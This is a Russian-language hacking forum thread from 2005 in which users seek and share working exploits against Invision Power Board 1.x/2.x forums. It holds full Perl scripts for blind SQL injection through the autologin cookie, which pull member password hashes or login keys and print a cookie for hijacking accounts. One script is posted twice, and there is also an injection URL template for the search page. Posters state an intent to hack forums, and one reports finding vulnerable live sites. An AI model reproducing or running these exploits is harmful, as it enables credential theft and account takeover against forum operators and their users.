Вопрос по exploit на форуме IPB 2.*

Discussion in 'Песочница' started by tester, 21 Jul 2005.

  1. /W0W3/s

    /W0W3/s HarD CorE

    Joined:
    18 Jun 2005
    Messages:
    646
    Likes Received:
    212
    Reputations:
    85
    2 Ain сиравно не пачит.. У тя есть рабочий эксплойд?!
     
  2. WizART

    WizART Elder - Старейшина

    Joined:
    19 Jul 2005
    Messages:
    267
    Likes Received:
    11
    Reputations:
    0
    ищи на rst.void.ru или ручками в яндексе..
     
  3. AIN

    AIN New Member

    Joined:
    29 Jul 2005
    Messages:
    58
    Likes Received:
    0
    Reputations:
    0
    1)
    Code:
    #!/usr/bin/perl
    
    ## Invision Power Board SQL injection exploit by RST/GHC
    ## vulnerable forum versions : 1.* , 2.* (<2.0.4)
    ## tested on version 1.3 Final and version 2.0.2 
    ## * work on all mysql versions
    ## * work with magic_quotes On (use %2527 for bypass magic_quotes_gpc = On)
    ## (c)oded by 1dt.w0lf
    ## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    ## screen:
    ## ~~~~~~~
    ## r57ipb2.pl blah.com /ipb13/ 1 0
    ## [~]    SERVER : blah.com 
    ## [~]      PATH : /ipb13/
    ## [~] MEMBER ID : 1
    ## [~]    TARGET : 0 - IPB 1.*
    ## [~] SEARCHING PASSWORD ... [ DONE ]
    ##
    ## MEMBER ID : 1
    ## PASSWORD : 5f4dcc3b5aa765d61d8327deb882cf99
    ##
    ## r57ipb2.pl blah.com  /ipb202/ 1 1
    ## [~]    SERVER : blah.com 
    ## [~]      PATH : /ipb202/
    ## [~] MEMBER ID : 1
    ## [~]    TARGET : 1 - IPB 2.*
    ## [~] SEARCHING PASSWORD ... [ DONE ]
    ##
    ## MEMBER ID : 1
    ## MEMBER_LOGIN_KEY : f14c54ff6915dfe3827c08f47617219d
    ## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    ## Greets: James Bercegay of the GulfTech Security Research Team 
    ## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    ## Credits: RST/GHC , http://rst.void.ru , http://ghc.ru 
    ## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    
    use IO::Socket;
    
    if (@ARGV < 4) { &usage; }
    
    $server    = $ARGV[0];
    $path      = $ARGV[1];
    $member_id = $ARGV[2];
    $target    = $ARGV[3];
    
    $pass = ($target)?('member_login_key'):('password');
    
    $server =~ s!(http:\/\/)!!;
    
    $request  = 'http://';
    $request .= $server;
    $request .= $path;
    
    $s_num = 1;
    $|++;
    $n = 0;
    
    print "[~]    SERVER : $server\r\n";
    print "[~]      PATH : $path\r\n";
    print "[~] MEMBER ID : $member_id\r\n";
    print "[~]    TARGET : $target";
    print (($target)?(' - IPB 2.*'):(' - IPB 1.*'));
    print "\r\n";
    print "[~] SEARCHING PASSWORD ... [|]";
    
    ($cmember_id = $member_id) =~ s/(.)/"%".uc(sprintf("%2.2x",ord($1)))/eg;
    
    while(1)
    {
    if(&found(47,58)==0) { &found(96,122); } 
    $char = $i;
    if ($char=="0") 
     { 
     if(length($allchar) > 0){
     print qq{\b\b DONE ] 
     
     MEMBER ID : $member_id
     };
     print (($target)?('MEMBER_LOGIN_KEY : '):('PASSWORD : '));
     print $allchar."\r\n";
     }
     else
     {
     print "\b\b FAILED ]";
     }
     exit();  
     }
    else 
     {  
      $allchar .= chr($i);
     }
    $s_num++;
    }
    
    sub found($$)
     {
     my $fmin = $_[0];
     my $fmax = $_[1];
     if (($fmax-$fmin)<5) { $i=crack($fmin,$fmax); return $i; }
     
     $r = int($fmax - ($fmax-$fmin)/2);
     $check = " BETWEEN $r AND $fmax";
     if ( &check($check) ) { &found($r,$fmax); }
     else { &found($fmin,$r); }
     }
     
    sub crack($$)
     {
     my $cmin = $_[0];
     my $cmax = $_[1];
     $i = $cmin;
     while ($i<$cmax)
      {
      $crcheck = "=$i";
      if ( &check($crcheck) ) { return $i; }
      $i++;
      }
     $i = 0;
     return $i;
     }
     
    sub check($)
     {
     $n++;
     status();
     $ccheck = $_[0];
     $pass_hash1 = "%36%36%36%2527%20%4F%52%20%28%69%64%3D";
     $pass_hash2 = "%20%41%4E%44%20%61%73%63%69%69%28%73%75%62%73%74%72%69%6E%67%28"; 
     $pass_hash3 = $pass.",".$s_num.",1))".$ccheck.") /*";
     $pass_hash3 =~ s/(.)/"%".uc(sprintf("%2.2x",ord($1)))/eg;
     $nmalykh    = "%20%EC%E0%EB%FB%F5%20%2D%20%EF%E8%E4%E0%F0%E0%F1%21%20";
     $socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server", PeerPort => "80");
    
     printf $socket ("GET %sindex.php?act=Login&CODE=autologin HTTP/1.0\nHost: %s\nAccept: */*\nCookie: member_id=%s; pass_hash=%s%s%s%s%s\nConnection: close\n\n",
     $path,$server,$cmember_id,$pass_hash1,$cmember_id,$pass_hash2,$pass_hash3,$nmalykh);
     
     while(<$socket>) 
      { 
      if (/Set-Cookie: session_id=0;/) { return 1; }
      } 
    
     return 0;
     }
     
    sub status()
    {
      $status = $n % 5;
      if($status==0){ print "\b\b/]";  }
      if($status==1){ print "\b\b-]";  }
      if($status==2){ print "\b\b\\]"; }
      if($status==3){ print "\b\b|]";  }
    }
    
    sub usage()
     {
     print q(
     Invision Power Board v < 2.0.4 SQL injection exploit
     ----------------------------------------------------
     USAGE:
     ~~~~~~
     r57ipb2.pl [server] [/folder/] [member_id] [target]
     
     [server]    - host where IPB installed
     [/folder/]  - folder where IPB installed
     [member_id] - user id for brute
     
     targets:
              0 - IPB 1.*
              1 - IPB 2.* (Prior To 2.0.4)
     
     e.g. r57ipb2.pl 127.0.0.1 /IPB/ 1 1
     ----------------------------------------------------
     (c)oded by 1dt.w0lf
     RST/GHC , http://rst.void.ru , http://ghc.ru
     );
     exit();
     }
    2)
    Code:
    #!/usr/bin/perl -w
    
    # This one actually works :) Just paste the outputted cookie into
    # your request header using livehttpheaders or something and you
    # will probably be logged in as that user. No need to decrypt it!
    # Exploit coded by "ReMuSOMeGa & Nova" and http://www.h4cky0u.org
    
    # edited by rav3n http://skides.net.ru
    
    use IO::Socket;
    
    if (!$ARGV[0]) {$ARGV[0] = '';}
    if (!$ARGV[3]) {$ARGV[3] = '';}
    
    my $host = $ARGV[0]; # hostname
    my $path = $ARGV[1] . 'index.php?act=Login&CODE=autologin';
    my $user = $ARGV[2]; # userid to jack
    my $iver = $ARGV[3]; # version 1 or 2
    if($ARGV[4]) { $cpre = $ARGV[4] } else { $cpre = "" }
    my $dbug = $ARGV[5]; # debug?
    if (!$ARGV[3])
    {
    print "... By rav3n Usage: ipb_skides.pl site.org /forum/ [id] [ver1/2] [cookie_prefix] [debug].\n\n";
    exit;
    }
    
    my @charset = ("0","1","2","3","4","5","6","7","8","9","a","b","c","d","e","f");
    my $outputs = '';
    
    M1:
    for( $i=1; $i < 33; $i++ )
    {
    for( $j=0; $j < 16; $j++ )
    {
    my $current = $charset[$j];
    my $sql = ( $iver < 2 ) ? "99%2527+OR+(id%3d$user+AND+MID(password,$i,1)%3d%2527$current%2527)/*" : "99%2527+OR+(id%3d$user+AND+MID(member_login_key,$i,1)%3d%2527$current%2527)/*";
    $cookie = $cpre . "member_id=31337420; " . $cpre . "pass_hash=" . $sql;
    
    $socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$host", PeerPort => "80") || die "FAILED\n\n";
    print $socket "GET $path HTTP/1.1\n";
    print $socket "Host: $host\n";
    print $socket "Accept: */*\n";
    print $socket "Cookie: $cookie\n";
    print $socket "Connection: close\n\n";
    
    # If we get a valid sql request then this
    # does not appear anywhere in the Location header
    $pattern = 'act=Login&CODE=';
    
    $failed = 0;
    while(<$socket>)
    {    
        if($dbug) { print };
        if(/$pattern/)  { $failed = 1; }
    }
    
    if($failed==0){
          $outputs .= $current;
          print "$i char: $current\n";
          next M1;
    }
    
    }
    if ( length($outputs) < 1 ) { print "Not Exploitable!\n"; exit; }
    }
    print "Cookie: " . $cpre . "member_id=" . $user . ";" . $cpre . "pass_hash=" . $outputs;
    exit;

    3)
    Code:
    http://www.board.com/forum/index.php?act=Search&nav=lv&CODE=show&
    searchid={SESSION_ID}&search_in=topics&result_type=topics&hl=&st=20[SQL code]/* 
     
  4. GaD

    GaD New Member

    Joined:
    7 Apr 2005
    Messages:
    19
    Likes Received:
    0
    Reputations:
    0
    первый код не работает пишит что-то типа про не верную переменную в строке 134, так есть у кого-нить рабочий? А второй хочет префикс к хеше чо это такое?
     
  5. /W0W3/s

    /W0W3/s HarD CorE

    Joined:
    18 Jun 2005
    Messages:
    646
    Likes Received:
    212
    Reputations:
    85
    2 Ain первый грит Файлд, а третий форум который я хочу хакнуть эту диру закрили...
     
  6. /W0W3/s

    /W0W3/s HarD CorE

    Joined:
    18 Jun 2005
    Messages:
    646
    Likes Received:
    212
    Reputations:
    85
    у меня вот этот сплойт работал а ща не работает......

    #!/usr/bin/perl

    ## Invision Power Board SQL injection exploit by RST/GHC
    ## vulnerable forum versions : 1.* , 2.* (<2.0.4)
    ## tested on version 1.3 Final and version 2.0.2
    ## * work on all mysql versions
    ## * work with magic_quotes On (use %2527 for bypass magic_quotes_gpc = On)
    ## (c)oded by 1dt.w0lf
    ## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    ## screen:
    ## ~~~~~~~
    ## r57ipb2.pl blah.com /ipb13/ 1 0
    ## [~] SERVER : blah.com
    ## [~] PATH : /ipb13/
    ## [~] MEMBER ID : 1
    ## [~] TARGET : 0 - IPB 1.*
    ## [~] SEARCHING PASSWORD ... [ DONE ]
    ##
    ## MEMBER ID : 1
    ## PASSWORD : 5f4dcc3b5aa765d61d8327deb882cf99
    ##
    ## r57ipb2.pl blah.com /ipb202/ 1 1
    ## [~] SERVER : blah.com
    ## [~] PATH : /ipb202/
    ## [~] MEMBER ID : 1
    ## [~] TARGET : 1 - IPB 2.*
    ## [~] SEARCHING PASSWORD ... [ DONE ]
    ##
    ## MEMBER ID : 1
    ## MEMBER_LOGIN_KEY : f14c54ff6915dfe3827c08f47617219d
    ## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    ## Greets: James Bercegay of the GulfTech Security Research Team
    ## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    ## Credits: RST/GHC , http://rst.void.ru , http://ghc.ru
    ## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

    use IO::Socket;

    if (@ARGV < 4) { &usage; }

    $server = $ARGV[0];
    $path = $ARGV[1];
    $member_id = $ARGV[2];
    $target = $ARGV[3];

    $pass = ($target)?('member_login_key'):('password');

    $server =~ s!(http:\/\/)!!;

    $request = 'http://';
    $request .= $server;
    $request .= $path;

    $s_num = 1;
    $|++;
    $n = 0;

    print "[~] SERVER : $server\r\n";
    print "[~] PATH : $path\r\n";
    print "[~] MEMBER ID : $member_id\r\n";
    print "[~] TARGET : $target";
    print (($target)?(' - IPB 2.*'):(' - IPB 1.*'));
    print "\r\n";
    print "[~] SEARCHING PASSWORD ... [|]";

    ($cmember_id = $member_id) =~ s/(.)/"%".uc(sprintf("%2.2x",ord($1)))/eg;

    while(1)
    {
    if(&found(47,58)==0) { &found(96,122); }
    $char = $i;
    if ($char=="0")
    {
    if(length($allchar) > 0){
    print qq{\b\b DONE ]

    MEMBER ID : $member_id
    };
    print (($target)?('MEMBER_LOGIN_KEY : '):('PASSWORD : '));
    print $allchar."\r\n";
    }
    else
    {
    print "\b\b FAILED ]";
    }
    exit();
    }
    else
    {
    $allchar .= chr($i);
    }
    $s_num++;
    }

    sub found($$)
    {
    my $fmin = $_[0];
    my $fmax = $_[1];
    if (($fmax-$fmin)<5) { $i=crack($fmin,$fmax); return $i; }

    $r = int($fmax - ($fmax-$fmin)/2);
    $check = " BETWEEN $r AND $fmax";
    if ( &check($check) ) { &found($r,$fmax); }
    else { &found($fmin,$r); }
    }

    sub crack($$)
    {
    my $cmin = $_[0];
    my $cmax = $_[1];
    $i = $cmin;
    while ($i<$cmax)
    {
    $crcheck = "=$i";
    if ( &check($crcheck) ) { return $i; }
    $i++;
    }
    $i = 0;
    return $i;
    }

    sub check($)
    {
    $n++;
    status();
    $ccheck = $_[0];
    $pass_hash1 = "%36%36%36%2527%20%4F%52%20%28%69%64%3D";
    $pass_hash2 = "%20%41%4E%44%20%61%73%63%69%69%28%73%75%62%73%74%72%69%6E%67%28";
    $pass_hash3 = $pass.",".$s_num.",1))".$ccheck.") /*";
    $pass_hash3 =~ s/(.)/"%".uc(sprintf("%2.2x",ord($1)))/eg;
    $nmalykh = "%20%EC%E0%EB%FB%F5%20%2D%20%EF%E8%E4%E0%F0%E0%F1%21%20";
    $socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server", PeerPort => "80");

    printf $socket ("GET %sindex.php?act=Login&CODE=autologin HTTP/1.0\nHost: %s\nAccept: */*\nCookie: member_id=%s; pass_hash=%s%s%s%s%s\nConnection: close\n\n",
    $path,$server,$cmember_id,$pass_hash1,$cmember_id,$pass_hash2,$pass_hash3,$nmalykh);

    while(<$socket>)
    {
    if (/Set-Cookie: session_id=0;/) { return 1; }
    }

    return 0;
    }

    sub status()
    {
    $status = $n % 5;
    if($status==0){ print "\b\b/]"; }
    if($status==1){ print "\b\b-]"; }
    if($status==2){ print "\b\b\\]"; }
    if($status==3){ print "\b\b|]"; }
    }

    sub usage()
    {
    print q(
    Invision Power Board v < 2.0.4 SQL injection exploit
    ----------------------------------------------------
    USAGE:
    ~~~~~~
    r57ipb2.pl [server] [/folder/] [member_id] [target]

    [server] - host where IPB installed
    [/folder/] - folder where IPB installed
    [member_id] - user id for brute

    targets:
    0 - IPB 1.*
    1 - IPB 2.* (Prior To 2.0.4)

    e.g. r57ipb2.pl 127.0.0.1 /IPB/ 1 1
    ----------------------------------------------------
    (c)oded by 1dt.w0lf
    RST/GHC , http://rst.void.ru , http://ghc.ru
    );
    exit();
    }
     
  7. Loo

    Loo New Member

    Joined:
    1 Jun 2005
    Messages:
    12
    Likes Received:
    0
    Reputations:
    0
    SK | Heaton
    ты думаешь все админы тупые и не ходят на securelab и ibresource???
    AIN
    2)$cookie = $cpre . "member_id=31337420; " . $cpre . "pass_hash=" . $sql;
    это разве правильная строка??
    3)http://www.board.com/forum/index.php?act=Search&nav=lv&CODE=show&
    searchid={SESSION_ID}&search_in=topics&result_type=topics&hl=&st=20[SQL code]/*
    это ваще бред какой-то.. что тебе это даст??
     
  8. AIN

    AIN New Member

    Joined:
    29 Jul 2005
    Messages:
    58
    Likes Received:
    0
    Reputations:
    0
    2) Правельная!!! У меня все работает Ok.
    3) А это я как то видел скачал НО НЕ ПРОВЕРЯЛ!
     
  9. Loo

    Loo New Member

    Joined:
    1 Jun 2005
    Messages:
    12
    Likes Received:
    0
    Reputations:
    0
    Ain
    2)а что значит "31337420; "????
     
  10. AIN

    AIN New Member

    Joined:
    29 Jul 2005
    Messages:
    58
    Likes Received:
    0
    Reputations:
    0
    А НRеН его знает спроси у АВТОРА!
     
  11. /W0W3/s

    /W0W3/s HarD CorE

    Joined:
    18 Jun 2005
    Messages:
    646
    Likes Received:
    212
    Reputations:
    85
    Ну если хрен, тогда не надо было вставлять на эту тему...
     
  12. Azazel

    Azazel Заведующий всем

    Joined:
    17 Apr 2005
    Messages:
    918
    Likes Received:
    213
    Reputations:
    154
    Не хотите ничего учить - надо быть хотя-бы внимательней.
    Правда от этого глаза устают... :)
     
  13. WizART

    WizART Elder - Старейшина

    Joined:
    19 Jul 2005
    Messages:
    267
    Likes Received:
    11
    Reputations:
    0
    лолы,читайте че это такое в исходном скрипте, видно же что member_id, значит номер пользователя...
     
  14. Loo

    Loo New Member

    Joined:
    1 Jun 2005
    Messages:
    12
    Likes Received:
    0
    Reputations:
    0
    WizART
    да млин, ты тут не выпендривайся, это все понимают
     
  15. WizART

    WizART Elder - Старейшина

    Joined:
    19 Jul 2005
    Messages:
    267
    Likes Received:
    11
    Reputations:
    0
    а по-моему, нет.
     
  16. BarNet

    BarNet New Member

    Joined:
    13 Aug 2005
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    Скрипт работает. Выводит только хеш, тобиш куки...А вот соль не достает...MySQL 4.1.12 =(
     
  17. WizART

    WizART Elder - Старейшина

    Joined:
    19 Jul 2005
    Messages:
    267
    Likes Received:
    11
    Reputations:
    0
    =\ это как так?) мож у тя сплойт косой?
     
  18. Azazel

    Azazel Заведующий всем

    Joined:
    17 Apr 2005
    Messages:
    918
    Likes Received:
    213
    Reputations:
    154
    Так это же хорошо. Simple Pass Hash - всё что надо. Бруть его просто. Нафига с солью мудохаться?
     
  19. coyl

    coyl Elder - Старейшина

    Joined:
    14 Jan 2005
    Messages:
    125
    Likes Received:
    3
    Reputations:
    2
    ЭЭЭЭЭ! нука все рабочие сплоиты нафик! если автор сделал защиту, то неифига тут её убирать для всех. чтоб всякие лохи потом крушили все на своём пути. млин! не уберете - буду базарить с кезом.
     
  20. undying

    undying New Member

    Joined:
    15 Aug 2005
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    вот проверил:
    Code:
    #!/usr/bin/perl -w
    ##################################################################
    # This one actually works smile.gif Just paste the outputted cookie into
    # your request header using livehttpheaders or something and you
    # will probably be logged in as that user. No need to decrypt it!
    # Exploit coded by "ReMuSOMeGa & Nova" and http://www.h4cky0u.org
    ##################################################################
    
    use LWP::UserAgent;
    
      $ua = new LWP::UserAgent;
      $ua->agent("Mosiac 1.0" . $ua->agent);
    
    if (!$ARGV[0]) {$ARGV[0] = '';}
    if (!$ARGV[3]) {$ARGV[3] = '';}
    
    my $path = $ARGV[0] . '/index.php?act=Login&CODE=autologin';
    my $user = $ARGV[1];  # userid to jack
    my $iver = $ARGV[2];  # version 1 or 2
    my $cpre = $ARGV[3];  # cookie prefix
    my $dbug = $ARGV[4];  # debug?
    
    if (!$ARGV[2])
    {
            print "..By ReMuSoMeGa & Nova. Usage: ipb.pl http://forums.site.org [id] [ver
    1/2].\n\n";
            exit;
    }
    
    my @charset = ("0","1","2","3","4","5","6","7","8","9","a","b","c","d","e","f");
    
    my $outputs = '';
    
    for( $i=1; $i < 33; $i++ )
    {
            for( $j=0; $j < 16; $j++ )
            {
                    my $current = $charset[$j];
                my $sql = ( $iver < 2 ) ? 
    "99%2527+OR+(id%3d$user+AND+MID(password,$i,1)%3d%2527$current%2527)/*" :
    "99%2527+OR+(id%3d$user+AND+MID(member_login_key,$i,1)%3d%2527$current%2
    527)/*";
                    my @cookie = ('Cookie' => $cpre . "member_id=31337420; " . $cpre .
    "pass_hash=" . $sql);
                    my $res = $ua->get($path, @cookie);
    
                    # If we get a valid sql request then this
                    # does not appear anywhere in the sources
                    $pattern = '<title>(.*)Log In(.*)</title>';
    
                    $_ = $res->content;
    
                    if ($dbug) { print };
    
                    if ( !(/$pattern/) )
                    {
                            $outputs .= $current;
                            print "$current\n";
                        last;
                    }
    
            }
      if ( length($outputs) < 1 )  { print "Not Exploitable!\n"; exit;    }
    }
    print "Cookie: " . $cpre . "member_id=" . $user . ";" . $cpre . "pass_hash=" . $outputs;
    exit; 
    
    Работает на IPB 2.0.14 вернее 4 на 6 форумов уязвимы :)
    нщ к сожелению выдает нолики толко, наверное защита. Если кто найдет ошибку pls напишите мне на PW :)
     
Loading...
Similar Threads - Вопрос exploit форуме
  1. gilo20
    Replies:
    2
    Views:
    2,507
  2. Dobi768
    Replies:
    2
    Views:
    2,422
  3. avva99on
    Replies:
    0
    Views:
    2,422